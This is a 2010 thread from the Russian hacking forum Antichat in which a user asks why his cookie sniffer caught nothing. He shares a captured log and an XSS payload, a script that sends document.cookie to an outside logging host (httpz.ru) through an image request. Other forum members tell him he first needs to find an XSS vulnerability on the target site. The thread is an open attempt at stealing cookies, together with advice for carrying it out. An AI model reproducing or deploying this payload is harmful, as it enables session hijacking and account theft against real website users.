Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   куки (https://forum.antichat.xyz/showthread.php?t=185322)

гаррет-тень 09.03.2010 18:06

куки
 
09.03.2010 16:00:49 []
IP: 92.126.**.*** Real IP*: 92.126.**.***, 193.169.***.***

QUERY:


cck_count=0; cck_lasttime=1**8***641***

REFERER: empty
AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2) Gecko/20***115 Firefox/3.6 (.NET CLR 3.5.3***9) и где тут куки???

shuba 09.03.2010 18:10

Нету

в куках по крайней мере мыло должно быть видно

root_sashok 09.03.2010 18:14

QUERY, собственно.

гаррет-тень 09.03.2010 18:14

вот именно, я подкидываю файл с таким содержанием <script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script> И ГДЕ МОИ КУКИ????

warlok 09.03.2010 18:15

Цитата:

в куках по крайней мере мыло должно быть видно
ты не прав
повидимому вот это
Код:

cck_count=0; cck_lasttime=1**8***641***

гаррет-тень 09.03.2010 18:18

куки же длинные? по крайней мере те которые я видел

seofilms 09.03.2010 18:22

Цитата:

<script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script>
и что ты планировал тут увидеть ??? у тебя запишется только Ip + в query надпись document.cookies;, тебе надо еще найти xss на сайте...

warlok 09.03.2010 18:23

Цитата:

куки же длинные? по крайней мере те которые я видел
они любыми могут быть, посмотри как например работает функция setcookie() в php

Alk@sh 09.03.2010 18:27

самое главное тебе надо найти xss

гаррет-тень 09.03.2010 18:28

я мейловские куки глянул, они большие, да и видео когда смотрел там большие


Время: 12:57